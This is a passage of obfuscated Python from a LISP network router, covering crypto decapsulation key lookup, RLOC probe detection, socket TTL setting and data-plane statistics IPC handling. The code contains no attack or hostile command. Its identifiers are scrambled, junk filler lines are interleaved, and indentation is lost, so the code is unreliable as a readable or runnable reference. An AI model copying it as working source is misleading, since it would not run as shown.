IiIii1iIIII = packet [ 0 : 2 ] + struct . pack ( "H" , i1iIii ) + packet [ 4 : 6 ] + struct . pack ( "H" , 0 ) + packet [ 8 : 10 ] + struct . pack ( "H" , 0 ) + packet [ 12 : 20 ]
if 59 - 59: iIii1I11I1II1 % OOooOOo / OoOoOO00 * I1Ii111 * OoooooooOO * O0
if 43 - 43: OoO0O00 * I1IiiI * OOooOOo * O0 - O0 / o0oOOo0O0Ooo
IiIii1iIIII = lisp_ip_checksum ( IiIii1iIIII )
return ( IiIii1iIIII + packet [ 20 : : ] )
if 77 - 77: I11i % I1Ii111 . IiII % OoooooooOO * o0oOOo0O0Ooo
if 87 - 87: iII111i + IiII / ooOoO0o * ooOoO0o * OOooOOo
if 97 - 97: I1Ii111
if 47 - 47: iII111i / I1ii11iIi11i - Ii1I . II111iiii
if 56 - 56: O0 - i1IIi % o0oOOo0O0Ooo + IiII
if 42 - 42: o0oOOo0O0Ooo . OOooOOo % I11i - OoOoOO00
if 38 - 38: OoooooooOO
if 27 - 27: O0 + I1ii11iIi11i % Ii1I . i1IIi + OoO0O00 + OoOoOO00
def lisp_get_crypto_decap_lookup_key ( addr , port ) :
O0O0 = addr . print_address_no_iid ( ) + ":" + str ( port )
if ( O0O0 in lisp_crypto_keys_by_rloc_decap ) : return ( O0O0 )
if 22 - 22: II111iiii / I1IiiI + o0oOOo0O0Ooo * I1IiiI . OoooooooOO * OOooOOo
O0O0 = addr . print_address_no_iid ( )
if ( O0O0 in lisp_crypto_keys_by_rloc_decap ) : return ( O0O0 )
if 49 - 49: I1ii11iIi11i * I1IiiI + OOooOOo + i11iIiiIii * I1ii11iIi11i . o0oOOo0O0Ooo
if 36 - 36: o0oOOo0O0Ooo - i11iIiiIii
if 37 - 37: O0 + IiII + I1IiiI
if 50 - 50: OoooooooOO . I1Ii111
if 100 - 100: ooOoO0o * ooOoO0o - Ii1I
for I1OO in lisp_crypto_keys_by_rloc_decap :
OO0O00o0 = I1OO . split ( ":" )
if ( len ( OO0O00o0 ) == 1 ) : continue
OO0O00o0 = OO0O00o0 [ 0 ] if len ( OO0O00o0 ) == 2 else ":" . join ( OO0O00o0 [ 0 : - 1 ] )
if ( OO0O00o0 == O0O0 ) :
iI1iiiiiii = lisp_crypto_keys_by_rloc_decap [ I1OO ]
lisp_crypto_keys_by_rloc_decap [ O0O0 ] = iI1iiiiiii
return ( O0O0 )
if 8 - 8: iIii1I11I1II1 - o0oOOo0O0Ooo
if 68 - 68: Ii1I % o0oOOo0O0Ooo / OoooooooOO + Ii1I - Ii1I
return ( None )
if 79 - 79: II111iiii / IiII
if 4 - 4: O0 - i11iIiiIii % ooOoO0o * O0 - ooOoO0o
if 96 - 96: oO0o % II111iiii . Ii1I % OoO0O00 . iIii1I11I1II1 / IiII
if 96 - 96: o0oOOo0O0Ooo / O0 . iIii1I11I1II1 . Ii1I % OOooOOo % II111iiii
if 5 - 5: OoooooooOO / I1Ii111 % I1Ii111 / I1IiiI
if 19 - 19: I1IiiI - ooOoO0o % IiII - o0oOOo0O0Ooo * OOooOOo + I1ii11iIi11i
if 44 - 44: i1IIi
if 85 - 85: I1ii11iIi11i / IiII + oO0o
if 95 - 95: IiII . OoO0O00
if 36 - 36: IiII % Ii1I - OoOoOO00 + OoO0O00 + IiII * Ii1I
if 15 - 15: I1IiiI / O0 % I1ii11iIi11i % OoOoOO00 . OoOoOO00 + iII111i
def lisp_build_crypto_decap_lookup_key ( addr , port ) :
addr = addr . print_address_no_iid ( )
OOo0o0o = addr + ":" + str ( port )
if 37 - 37: O0 . II111iiii
if ( lisp_i_am_rtr ) :
if ( addr in lisp_rloc_probe_list ) : return ( addr )
if 56 - 56: II111iiii / oO0o + o0oOOo0O0Ooo / OOooOOo * OoO0O00
if 29 - 29: O0
if 43 - 43: Oo0Ooo / OoO0O00 * Oo0Ooo . IiII + I11i
if 46 - 46: iIii1I11I1II1 % i1IIi - OoooooooOO . Ii1I
if 91 - 91: iII111i - i11iIiiIii
if 27 - 27: iII111i
for iII1ii1 in list ( lisp_nat_state_info . values ( ) ) :
for Iiii1iiI in iII1ii1 :
if ( addr == Iiii1iiI . address ) : return ( OOo0o0o )
if 66 - 66: O0 . iIii1I11I1II1 * II111iiii * OOooOOo * IiII
if 44 - 44: i11iIiiIii % ooOoO0o * i11iIiiIii + Oo0Ooo + I1ii11iIi11i + Ii1I
return ( addr )
if 43 - 43: i1IIi . iIii1I11I1II1
return ( OOo0o0o )
if 86 - 86: OOooOOo + OoOoOO00 - OoO0O00 + i1IIi + iIii1I11I1II1
if 68 - 68: OoOoOO00 . I1IiiI + ooOoO0o - o0oOOo0O0Ooo
if 62 - 62: Ii1I - OOooOOo
if 88 - 88: iIii1I11I1II1 * Oo0Ooo / II111iiii / IiII / OoO0O00 % ooOoO0o
if 19 - 19: I11i * iII111i . O0 * iII111i % I1ii11iIi11i - OoOoOO00
if 68 - 68: I1Ii111 - OoO0O00 % Ii1I + i1IIi . ooOoO0o
if 36 - 36: oO0o * iIii1I11I1II1 - O0 - IiII * O0 + i11iIiiIii
def lisp_set_ttl ( lisp_socket , ttl ) :
try :
lisp_socket . setsockopt ( socket . SOL_IP , socket . IP_TTL , ttl )
lisp_socket . setsockopt ( socket . SOL_IP , socket . IP_MULTICAST_TTL , ttl )
except :
lprint ( "socket.setsockopt(IP_TTL) not supported" )
pass
if 76 - 76: OoO0O00 % O0 / Ii1I + I1IiiI
return
if 23 - 23: I1IiiI % IiII . o0oOOo0O0Ooo
if 2 - 2: I1ii11iIi11i
if 51 - 51: iIii1I11I1II1 / II111iiii / iIii1I11I1II1 / oO0o % i1IIi
if 54 - 54: ooOoO0o
if 47 - 47: I11i * I1IiiI / oO0o
if 98 - 98: Ii1I / oO0o * O0 + I1Ii111 - I1Ii111 + iII111i
if 4 - 4: i1IIi
def lisp_is_rloc_probe_request ( lisp_type ) :
lisp_type = struct . unpack ( "B" , lisp_type ) [ 0 ]
return ( lisp_type == 0x12 )
if 43 - 43: oO0o * ooOoO0o - I11i
if 70 - 70: oO0o / Ii1I
if 15 - 15: iIii1I11I1II1 % ooOoO0o % i11iIiiIii
if 16 - 16: iII111i
if 50 - 50: iIii1I11I1II1 - II111iiii % i1IIi
if 48 - 48: O0
if 60 - 60: ooOoO0o - IiII % i1IIi
def lisp_is_rloc_probe_reply ( lisp_type ) :
lisp_type = struct . unpack ( "B" , lisp_type ) [ 0 ]
return ( lisp_type == 0x28 )
if 5 - 5: oO0o
if 29 - 29: i1IIi . OoOoOO00 . i1IIi + oO0o . I1Ii111 + O0
if 62 - 62: I1ii11iIi11i . IiII + OoO0O00 - OoOoOO00 * O0 + I1Ii111
if 58 - 58: oO0o . OoO0O00 / ooOoO0o
if 61 - 61: I11i + I1Ii111
if 27 - 27: ooOoO0o / i1IIi . oO0o - OoooooooOO
if 48 - 48: ooOoO0o % ooOoO0o / OoooooooOO + i1IIi * oO0o + ooOoO0o
if 69 - 69: iII111i . iII111i
if 46 - 46: IiII * Oo0Ooo + I1Ii111
if 79 - 79: IiII
if 89 - 89: IiII * I11i + I1ii11iIi11i * oO0o - II111iiii
if 58 - 58: ooOoO0o . I1Ii111 / i1IIi % I1ii11iIi11i + o0oOOo0O0Ooo
if 94 - 94: i11iIiiIii + I1Ii111 . iII111i - ooOoO0o % I1Ii111
if 94 - 94: i11iIiiIii - OOooOOo - O0 * OoooooooOO - ooOoO0o
if 35 - 35: iII111i . i11iIiiIii - OOooOOo % Oo0Ooo + Ii1I . iIii1I11I1II1
if 91 - 91: o0oOOo0O0Ooo / OoO0O00 + I1IiiI % i11iIiiIii % i1IIi
if 22 - 22: I1Ii111 * O0 % OoO0O00 * I1ii11iIi11i
if 47 - 47: OoO0O00 / OOooOOo / OoOoOO00 % i11iIiiIii / OoOoOO00
if 52 - 52: ooOoO0o / I11i % i11iIiiIii - I1Ii111 % ooOoO0o - o0oOOo0O0Ooo
def lisp_is_rloc_probe ( packet , rr ) :
O0I1II1 = ( struct . unpack ( "B" , packet [ 9 : 10 ] ) [ 0 ] == 17 )
if ( O0I1II1 == False ) : return ( [ packet , None , None , None ] )
if 67 - 67: OoOoOO00 / I1Ii111 + i11iIiiIii - IiII
oooooO0oO0ooO = struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ]
iIII1IiI = struct . unpack ( "H" , packet [ 22 : 24 ] ) [ 0 ]
o0O0O0OoO = ( socket . htons ( LISP_CTRL_PORT ) in [ oooooO0oO0ooO , iIII1IiI ] )
if ( o0O0O0OoO == False ) : return ( [ packet , None , None , None ] )
if 92 - 92: O0
if ( rr == 0 ) :
Oooooo0OOO = lisp_is_rloc_probe_request ( packet [ 28 : 29 ] )
if ( Oooooo0OOO == False ) : return ( [ packet , None , None , None ] )
elif ( rr == 1 ) :
Oooooo0OOO = lisp_is_rloc_probe_reply ( packet [ 28 : 29 ] )
if ( Oooooo0OOO == False ) : return ( [ packet , None , None , None ] )
elif ( rr == - 1 ) :
Oooooo0OOO = lisp_is_rloc_probe_request ( packet [ 28 : 29 ] )
if ( Oooooo0OOO == False ) :
Oooooo0OOO = lisp_is_rloc_probe_reply ( packet [ 28 : 29 ] )
if ( Oooooo0OOO == False ) : return ( [ packet , None , None , None ] )
if 52 - 52: iII111i - i11iIiiIii + o0oOOo0O0Ooo + i1IIi
if 58 - 58: OOooOOo - Ii1I * I1Ii111 - O0 . oO0o
if 72 - 72: i1IIi * iII111i * Ii1I / o0oOOo0O0Ooo . I1Ii111 + i11iIiiIii
if 33 - 33: I11i / OoO0O00 * ooOoO0o + iIii1I11I1II1
if 54 - 54: Oo0Ooo / IiII + i11iIiiIii . O0
if 94 - 94: OoooooooOO + iII111i * OoooooooOO / o0oOOo0O0Ooo
O0oo0OoO0oo = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
O0oo0OoO0oo . address = socket . ntohl ( struct . unpack ( "I" , packet [ 12 : 16 ] ) [ 0 ] )
if 12 - 12: iIii1I11I1II1 / iIii1I11I1II1 / II111iiii
if 93 - 93: oO0o
if 53 - 53: OoO0O00 * i1IIi / Oo0Ooo / OoO0O00 * ooOoO0o
if 77 - 77: iIii1I11I1II1 % I1IiiI + o0oOOo0O0Ooo + I1Ii111 * Oo0Ooo * i1IIi
if ( O0oo0OoO0oo . is_local ( ) ) : return ( [ None , None , None , None ] )
if 14 - 14: iIii1I11I1II1 * iIii1I11I1II1 - OOooOOo . iII111i / ooOoO0o
if 54 - 54: OoOoOO00 - I1IiiI - iII111i
if 49 - 49: i11iIiiIii * Oo0Ooo
if 100 - 100: Oo0Ooo * oO0o
O0oo0OoO0oo = O0oo0OoO0oo . print_address_no_iid ( )
ooO0 = socket . ntohs ( struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ] )
O0O00O = struct . unpack ( "B" , packet [ 8 : 9 ] ) [ 0 ] - 1
packet = packet [ 28 : : ]
if 85 - 85: OoooooooOO . IiII / IiII . ooOoO0o . IiII % II111iiii
iiiI1I = bold ( "Receive(pcap)" , False )
o0OoO0 = bold ( "from " + O0oo0OoO0oo , False )
iIIiiIi = lisp_format_packet ( packet )
lprint ( "{} {} bytes {} {}, packet: {}" . format ( iiiI1I , len ( packet ) , o0OoO0 , ooO0 , iIIiiIi ) )
if 65 - 65: oO0o - OoO0O00 / iII111i + ooOoO0o
return ( [ packet , O0oo0OoO0oo , ooO0 , O0O00O ] )
if 80 - 80: o0oOOo0O0Ooo + II111iiii * Ii1I % OoOoOO00 % I1IiiI + I1ii11iIi11i
if 46 - 46: Oo0Ooo / Oo0Ooo % iII111i % I1IiiI
if 85 - 85: OoO0O00 - Ii1I / O0
if 45 - 45: IiII + I1Ii111 / I11i
if 84 - 84: iII111i % II111iiii
if 86 - 86: IiII % II111iiii / i1IIi * I1ii11iIi11i - O0 * OOooOOo
if 53 - 53: OOooOOo * oO0o + i1IIi % Oo0Ooo + II111iiii
if 34 - 34: oO0o % iII111i / IiII . IiII + i11iIiiIii
if 68 - 68: O0 % oO0o * IiII % O0
if 55 - 55: O0 % I1IiiI % O0
if 27 - 27: I1IiiI + I1ii11iIi11i * I1Ii111 % Ii1I - Oo0Ooo
def lisp_ipc_write_xtr_parameters ( cp , dp ) :
if ( lisp_ipc_dp_socket == None ) : return
if 87 - 87: i11iIiiIii % OOooOOo - OoOoOO00 * ooOoO0o / Oo0Ooo
OO = { "type" : "xtr-parameters" , "control-plane-logging" : cp ,
"data-plane-logging" : dp , "rtr" : lisp_i_am_rtr }
if 74 - 74: OoooooooOO * ooOoO0o - I11i / I1ii11iIi11i % iIii1I11I1II1
lisp_write_to_dp_socket ( OO )
return
if 94 - 94: Ii1I * I1Ii111 + OoOoOO00 . iIii1I11I1II1
if 44 - 44: Oo0Ooo . Oo0Ooo * Oo0Ooo
if 23 - 23: I1Ii111 / iII111i . O0 % II111iiii
if 67 - 67: I11i / iIii1I11I1II1 / ooOoO0o
if 90 - 90: II111iiii % I1Ii111 - IiII . Oo0Ooo % OOooOOo - OoOoOO00
if 89 - 89: Oo0Ooo - I1ii11iIi11i . I1Ii111
if 65 - 65: ooOoO0o % OOooOOo + OOooOOo % I1Ii111 . I1IiiI % O0
if 46 - 46: OoO0O00 * I1Ii111 + iII111i . oO0o % OOooOOo / i11iIiiIii
def lisp_external_data_plane ( ) :
oO00o00 = 'egrep "ipc-data-plane = yes" ./lisp.config'
if ( getoutput ( oO00o00 ) != "" ) : return ( True )
if 1 - 1: I1ii11iIi11i % O0 - I1ii11iIi11i / OoooooooOO / OoO0O00
if ( os . getenv ( "LISP_RUN_LISP_XTR" ) != None ) : return ( True )
return ( False )
if 82 - 82: i1IIi % Ii1I
if 85 - 85: I1Ii111 * i11iIiiIii * iIii1I11I1II1 % iIii1I11I1II1
if 64 - 64: OoO0O00 / Ii1I
if 79 - 79: Ii1I % OOooOOo
if 39 - 39: I1ii11iIi11i / Ii1I - II111iiii . i1IIi
if 59 - 59: II111iiii
if 36 - 36: ooOoO0o . II111iiii - OoOoOO00 % I1ii11iIi11i * O0
if 91 - 91: iII111i + Oo0Ooo / OoooooooOO * iIii1I11I1II1 - OoO0O00
if 73 - 73: iIii1I11I1II1 % I1Ii111 % II111iiii * Oo0Ooo * OoO0O00
if 48 - 48: OOooOOo * i11iIiiIii - i11iIiiIii + iIii1I11I1II1 + I1IiiI % OoooooooOO
if 61 - 61: i1IIi
if 56 - 56: iIii1I11I1II1 / I11i * iII111i * I11i * OoooooooOO
if 44 - 44: I1ii11iIi11i - OOooOOo % I11i - I1Ii111 / iIii1I11I1II1 - OOooOOo
if 38 - 38: iIii1I11I1II1 - OoooooooOO * II111iiii . OoooooooOO + OOooOOo
def lisp_process_data_plane_restart ( do_clear = False ) :
os . system ( "touch ./lisp.config" )
if 59 - 59: OoooooooOO
i11I1 = { "type" : "entire-map-cache" , "entries" : [ ] }
if 96 - 96: I11i % o0oOOo0O0Ooo + i1IIi % II111iiii
if ( do_clear == False ) :
OOo00O = i11I1 [ "entries" ]
lisp_map_cache . walk_cache ( lisp_ipc_walk_map_cache , OOo00O )
if 96 - 96: o0oOOo0O0Ooo / i1IIi
if 42 - 42: Oo0Ooo - Oo0Ooo % O0 - OoO0O00
lisp_write_to_dp_socket ( i11I1 )
return
if 42 - 42: OoooooooOO * OOooOOo
if 93 - 93: OOooOOo + II111iiii . oO0o * Oo0Ooo - O0 + I1Ii111
if 99 - 99: OoO0O00 * o0oOOo0O0Ooo + OoOoOO00 * iIii1I11I1II1
if 38 - 38: I1ii11iIi11i - OOooOOo * O0 - I1ii11iIi11i
if 95 - 95: OoO0O00 . oO0o . OoooooooOO - iIii1I11I1II1
if 35 - 35: o0oOOo0O0Ooo / OoooooooOO - i1IIi * iIii1I11I1II1 + ooOoO0o
if 66 - 66: Oo0Ooo - OoOoOO00 . I1Ii111 + O0 + o0oOOo0O0Ooo
if 36 - 36: II111iiii % IiII . i11iIiiIii
if 88 - 88: Oo0Ooo . IiII * Oo0Ooo
if 92 - 92: I1IiiI % IiII
if 95 - 95: OoooooooOO / OoO0O00 % O0 / I1Ii111 * Ii1I + I1ii11iIi11i
if 7 - 7: ooOoO0o
if 83 - 83: oO0o / I1Ii111 + I1Ii111 * I1ii11iIi11i
if 8 - 8: I11i . I1ii11iIi11i % i1IIi + Ii1I
def lisp_process_data_plane_stats ( msg , lisp_sockets , lisp_port ) :
if ( "entries" not in msg ) :
lprint ( "No 'entries' in stats IPC message" )
return
if 63 - 63: I1IiiI / OoooooooOO
if ( type ( msg [ "entries" ] ) != list ) :
lprint ( "'entries' in stats IPC message must be an array" )
return
if 16 - 16: OoOoOO00
if 67 - 67: O0 . I1Ii111
for msg in msg [ "entries" ] :
if ( "eid-prefix" not in msg ) :
lprint ( "No 'eid-prefix' in stats IPC message" )
continue
if 42 - 42: OoOoOO00 % I1ii11iIi11i * I1Ii111 * i1IIi . i1IIi % OOooOOo
i1iiii = msg [ "eid-prefix" ]
if 90 - 90: oO0o * Oo0Ooo * oO0o . Ii1I * i1IIi
if ( "instance-id" not in msg ) :
lprint ( "No 'instance-id' in stats IPC message" )
continue
if 47 - 47: OOooOOo
oooo = int ( msg [ "instance-id" ] )
if 38 - 38: I11i
if 15 - 15: OoO0O00 / ooOoO0o . OoO0O00 - iIii1I11I1II1 + OoooooooOO - OoO0O00
if 44 - 44: O0 . OOooOOo . o0oOOo0O0Ooo . I1ii11iIi11i - II111iiii
if 71 - 71: I1ii11iIi11i + o0oOOo0O0Ooo . i11iIiiIii * oO0o . i1IIi
o0Ooo0Oooo0o = lisp_address ( LISP_AFI_NONE , "" , 0 , oooo )
o0Ooo0Oooo0o . store_prefix ( i1iiii )
I11iiI1III = lisp_map_cache_lookup ( None , o0Ooo0Oooo0o )
if ( I11iiI1III == None ) :
lprint ( "Map-cache entry for {} not found for stats update" . format ( i1iiii ) )
if 40 - 40: OoO0O00 - IiII
continue
if 43 - 43: I1Ii111 + i11iIiiIii % iII111i % I1Ii111 - ooOoO0o
if 85 - 85: IiII % iIii1I11I1II1 . I1Ii111
if ( "rlocs" not in msg ) :
lprint ( "No 'rlocs' in stats IPC message for {}" . format ( i1iiii ) )
if 38 - 38: iII111i - I1IiiI / ooOoO0o
continue
if 46 - 46: OOooOOo . O0 / i11iIiiIii . OOooOOo
if ( type ( msg [ "rlocs" ] ) != list ) :
lprint ( "'rlocs' in stats IPC message must be an array" )
continue
if 19 - 19: I11i / Oo0Ooo + I1Ii111
iiIi111I = msg [ "rlocs" ]
if 72 - 72: i11iIiiIii / IiII * OoOoOO00 * I11i
if 83 - 83: IiII % OoO0O00 * II111iiii
if 7 - 7: oO0o % Oo0Ooo
if 88 - 88: I1Ii111
for OoOO0OOo0OO in iiIi111I :
if ( "rloc" not in OoOO0OOo0OO ) : continue
if 40 - 40: i11iIiiIii . O0 * I11i - oO0o / OOooOOo . oO0o
IIIOo0O = OoOO0OOo0OO [ "rloc" ]
if ( IIIOo0O == "no-address" ) : continue
if 86 - 86: OOooOOo - I1Ii111 * IiII - i1IIi + ooOoO0o + I11i
iIIiI11 = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
iIIiI11 . store_address ( IIIOo0O )
if 32 - 32: IiII
OOOoOoo = I11iiI1III . get_rloc ( iIIiI11 )
if ( OOOoOoo == None ) : continue
if 99 - 99: II111iiii
if 34 - 34: OOooOOo + OoOoOO00 * o0oOOo0O0Ooo + I1ii11iIi11i + IiII * i1IIi
if 73 - 73: I1ii11iIi11i - IiII - O0 . oO0o + Oo0Ooo % iII111i
if 68 - 68: I1ii11iIi11i - OoooooooOO
IIIiiiIi11I1 = 0 if ( "packet-count" not in OoOO0OOo0OO ) else OoOO0OOo0OO [ "packet-count" ]
if 85 - 85: I1IiiI
i1Ii1iiii1Ii = 0 if ( "byte-count" not in OoOO0OOo0OO ) else OoOO0OOo0OO [ "byte-count" ]
if 97 - 97: I1ii11iIi11i - i11iIiiIii + OoOoOO00 * iIii1I11I1II1 * iIii1I11I1II1
i1 = 0 if ( "seconds-last-packet" not in OoOO0OOo0OO ) else OoOO0OOo0OO [ "seconds-last-packet" ]
if 51 - 51: i1IIi - O0 * I1IiiI * IiII * I11i % oO0o
if 47 - 47: i1IIi - I11i . OoooooooOO
OOOoOoo . stats . packet_count += IIIiiiIi11I1
OOOoOoo . stats . byte_count += i1Ii1iiii1Ii
OOOoOoo . stats . last_increment = lisp_get_timestamp ( ) - i1
if 5 - 5: iII111i % Oo0Ooo - oO0o . i1IIi - i11iIiiIii % I1ii11iIi11i
lprint ( "Update stats {}/{}/{}s for {} RLOC {}" . format ( IIIiiiIi11I1 , i1Ii1iiii1Ii ,
i1 , i1iiii , IIIOo0O ) )
if 79 - 79: I1IiiI
if 24 - 24: I1IiiI / II111iiii - I1Ii111
if 68 - 68: I1IiiI
if 97 - 97: Ii1I + o0oOOo0O0Ooo / OoO0O00
if 97 - 97: i11iIiiIii % iIii1I11I1II1 + II111iiii
if ( I11iiI1III . group . is_null ( ) and I11iiI1III . has_ttl_elapsed ( ) ) :
i1iiii = green ( I11iiI1III . print_eid_tuple ( ) , False )
lprint ( "Refresh map-cache entry {}" . format ( i1iiii ) )
lisp_send_map_request ( lisp_sockets , lisp_port , None , I11iiI1III . eid , None )
if 90 - 90: OOooOOo / I1IiiI
if 28 - 28: OoooooooOO + i1IIi
return
if 29 - 29: Oo0Ooo
if 98 - 98: OOooOOo / Oo0Ooo % Ii1I * OoooooooOO - oO0o
if 64 - 64: I1IiiI - I1IiiI
if 90 - 90: iII111i - I1IiiI - II111iiii / OOooOOo + Ii1I
if 34 - 34: i11iIiiIii + I1Ii111 / O0 / iIii1I11I1II1 * OoooooooOO % Ii1I
if 32 - 32: i11iIiiIii - OoOoOO00 / iIii1I11I1II1 * o0oOOo0O0Ooo % I1IiiI + O0
if 36 - 36: I1ii11iIi11i + I1ii11iIi11i % I1Ii111 * ooOoO0o * OoOoOO00
if 54 - 54: Oo0Ooo - I1IiiI % OOooOOo . I1ii11iIi11i / I1IiiI
if 75 - 75: OOooOOo - O0 % iII111i . Ii1I % I1ii11iIi11i + I1ii11iIi11i
if 32 - 32: Ii1I + II111iiii * IiII
if 9 - 9: I1Ii111
if 96 - 96: I1Ii111 / iIii1I11I1II1
if 48 - 48: iII111i * IiII + OoooooooOO
if 63 - 63: I1IiiI / Ii1I
if 31 - 31: i1IIi - oO0o
if 99 - 99: iII111i - i11iIiiIii + oO0o
if 66 - 66: Oo0Ooo * I11i . iIii1I11I1II1 - OoO0O00
if 11 - 11: I1Ii111 + iIii1I11I1II1 * O0 * Oo0Ooo
if 66 - 66: OoooooooOO % OoO0O00 + i11iIiiIii + I1Ii111 % OoO0O00
if 80 - 80: Oo0Ooo - Ii1I
if 54 - 54: O0 - iIii1I11I1II1 . OoO0O00 . IiII % OoO0O00
if 28 - 28: O0 % i1IIi % OoO0O00 / o0oOOo0O0Ooo . iIii1I11I1II1 - iII111i
if 50 - 50: o0oOOo0O0Ooo + iII111i / i1IIi % II111iiii
if 61 - 61: IiII
if 5 - 5: OOooOOo % iIii1I11I1II1 % O0 * i11iIiiIii / I1Ii111
def lisp_process_data_plane_decap_stats ( msg , lisp_ipc_socket ) :
if 48 - 48: IiII * oO0o
if 53 - 53: i1IIi * iIii1I11I1II1 . OOooOOo
if 68 - 68: IiII % IiII - iII111i . IiII + OoooooooOO
if 82 - 82: Ii1I . II111iiii / i1IIi * OoO0O00
if 80 - 80: I11i
if ( lisp_i_am_itr ) :
lprint ( "Send decap-stats IPC message to lisp-etr process" )
OO = "stats%{}" . format ( json . dumps ( msg ) )
OO = lisp_command_ipc ( OO , "lisp-itr" )
lisp_ipc ( OO , lisp_ipc_socket , "lisp-etr" )
return
if 96 - 96: i1IIi - I1ii11iIi11i * iII111i . OOooOOo . OoO0O00
if 93 - 93: oO0o * Oo0Ooo * IiII
if 26 - 26: o0oOOo0O0Ooo + O0 % i11iIiiIii . ooOoO0o . I1IiiI + Oo0Ooo
if 90 - 90: IiII * OoooooooOO + II111iiii / iII111i + i11iIiiIii / ooOoO0o
if 20 - 20: II111iiii % I1ii11iIi11i - OoooooooOO * Ii1I / I11i - OoooooooOO
if 11 - 11: I1IiiI + Ii1I + i11iIiiIii * I1ii11iIi11i - oO0o
if 46 - 46: OoooooooOO - Oo0Ooo
if 4 - 4: II111iiii . OOooOOo - Ii1I - i11iIiiIii
OO = bold ( "IPC" , False )
lprint ( "Process decap-stats {} message: '{}'" . format ( OO , msg ) )
if 27 - 27: iII111i * iII111i - OoO0O00 % o0oOOo0O0Ooo . o0oOOo0O0Ooo
if ( lisp_i_am_etr ) : msg = json . loads ( msg )
if 64 - 64: I1ii11iIi11i * ooOoO0o - OoooooooOO - I1IiiI
OOO0OOo = [ "good-packets" , "ICV-error" , "checksum-error" ,
"lisp-header-error" , "no-decrypt-key" , "bad-inner-version" ,
"outer-header-error" ]
if 67 - 67: OoooooooOO % I1IiiI + o0oOOo0O0Ooo + I1Ii111
for III1I11i in OOO0OOo :
IIIiiiIi11I1 = 0 if ( III1I11i not in msg ) else msg [ III1I11i ] [ "packet-count" ]
lisp_decap_stats [ III1I11i ] . packet_count += IIIiiiIi11I1
if 73 - 73: Ii1I
i1Ii1iiii1Ii = 0 if ( III1I11i not in msg ) else msg [ III1I11i ] [ "byte-count" ]
lisp_decap_stats [ III1I11i ] . byte_count += i1Ii1iiii1Ii
if 5 - 5: OOooOOo % OoooooooOO / Oo0Ooo
i1 = 0 if ( III1I11i not in msg ) else msg [ III1I11i ] [ "seconds-last-packet" ]
if 16 - 16: ooOoO0o * i11iIiiIii % i1IIi % i1IIi
lisp_decap_stats [ III1I11i ] . last_increment = lisp_get_timestamp ( ) - i1
if 44 - 44: Oo0Ooo % I11i - o0oOOo0O0Ooo - Ii1I * Oo0Ooo - Ii1I
return
if 69 - 69: II111iiii + o0oOOo0O0Ooo
if 75 - 75: OOooOOo
if 66 - 66: Oo0Ooo % oO0o
if 52 - 52: oO0o
if 26 - 26: OoO0O00 % I1ii11iIi11i * O0 % OoO0O00
if 98 - 98: OoO0O00 . ooOoO0o * I11i / i1IIi
if 57 - 57: i11iIiiIii % OOooOOo
if 67 - 67: oO0o - OOooOOo + II111iiii
if 19 - 19: iIii1I11I1II1 * OoooooooOO - i11iIiiIii . I1Ii111 * OoO0O00
if 30 - 30: iII111i + I1IiiI * ooOoO0o
if 53 - 53: iII111i + IiII
if 52 - 52: II111iiii * i11iIiiIii - IiII * IiII / OoooooooOO
if 18 - 18: IiII / O0 / I1ii11iIi11i
if 47 - 47: oO0o / iIii1I11I1II1
if 45 - 45: OoOoOO00 * o0oOOo0O0Ooo / I1ii11iIi11i * iII111i - I1ii11iIi11i
if 48 - 48: Ii1I / OoO0O00
if 45 - 45: O0 * OoO0O00 / I11i . II111iiii
def lisp_process_punt ( punt_socket , lisp_send_sockets , lisp_ephem_port ) :
i111IIi1 , O0oo0OoO0oo = punt_socket . recvfrom ( 4000 )
if 73 - 73: I11i
IIII = json . loads ( i111IIi1 )
if ( type ( IIII ) != dict ) :
lprint ( "Invalid punt message from {}, not in JSON format" . format ( O0oo0OoO0oo ) )
if 95 - 95: IiII - OoOoOO00 - iIii1I11I1II1 / o0oOOo0O0Ooo
return
if 33 - 33: IiII / o0oOOo0O0Ooo
O0I11iII1Ii11II = bold ( "Punt" , False )
lprint ( "{} message from '{}': '{}'" . format ( O0I11iII1Ii11II , O0oo0OoO0oo , IIII ) )
if 24 - 24: iIii1I11I1II1
if ( "type" not in IIII ) :
lprint ( "Punt IPC message has no 'type' key" )
return
if 78 - 78: ooOoO0o / i1IIi . OOooOOo * o0oOOo0O0Ooo . I1IiiI
if 81 - 81: I11i - OoO0O00 - o0oOOo0O0Ooo
if 95 - 95: I11i + Ii1I
if 68 - 68: i11iIiiIii + I1IiiI / o0oOOo0O0Ooo
if 63 - 63: I1IiiI
if ( IIII [ "type" ] == "statistics" ) :
lisp_process_data_plane_stats ( IIII , lisp_send_sockets , lisp_ephem_port )
return
if 20 - 20: oO0o + OoOoOO00
if ( IIII [ "type" ] == "decap-statistics" ) :
lisp_process_data_plane_decap_stats ( IIII , punt_socket )
return
if 32 - 32: o0oOOo0O0Ooo % oO0o % I1IiiI * OoooooooOO
if 4 - 4: OOooOOo % oO0o
if 18 - 18: Ii1I * I11i
if 14 - 14: ooOoO0o . ooOoO0o * OoOoOO00 * o0oOOo0O0Ooo - iII111i - I1Ii111
if 53 - 53: Oo0Ooo * OoOoOO00 * II111iiii % IiII - I1ii11iIi11i
if ( IIII [ "type" ] == "restart" ) :
lisp_process_data_plane_restart ( )
return
if 56 - 56: Oo0Ooo . I1ii11iIi11i - i11iIiiIii / iIii1I11I1II1 . ooOoO0o
if 28 - 28: OoooooooOO + I1IiiI / oO0o . iIii1I11I1II1 - oO0o
if 64 - 64: I1Ii111 + Oo0Ooo / iII111i
if 61 - 61: Ii1I * Ii1I . OoOoOO00 + OoO0O00 * i11iIiiIii * OoO0O00
if 4 - 4: OoooooooOO % iII111i % Oo0Ooo * IiII % o0oOOo0O0Ooo . o0oOOo0O0Ooo
if ( IIII [ "type" ] != "discovery" ) :
lprint ( "Punt IPC message has wrong format" )
return
if 66 - 66: I1IiiI . Oo0Ooo - oO0o
if ( "interface" not in IIII ) :
lprint ( "Invalid punt message from {}, required keys missing" . format ( O0oo0OoO0oo ) )
if 53 - 53: oO0o / Ii1I + oO0o + II111iiii
return
if 70 - 70: OoooooooOO - I1Ii111 + OoOoOO00
if 61 - 61: I1IiiI * I1Ii111 * i11iIiiIii
if 68 - 68: OoOoOO00 - iII111i - I1IiiI
if 37 - 37: iII111i - I1Ii111 + i1IIi / o0oOOo0O0Ooo % iII111i / iII111i
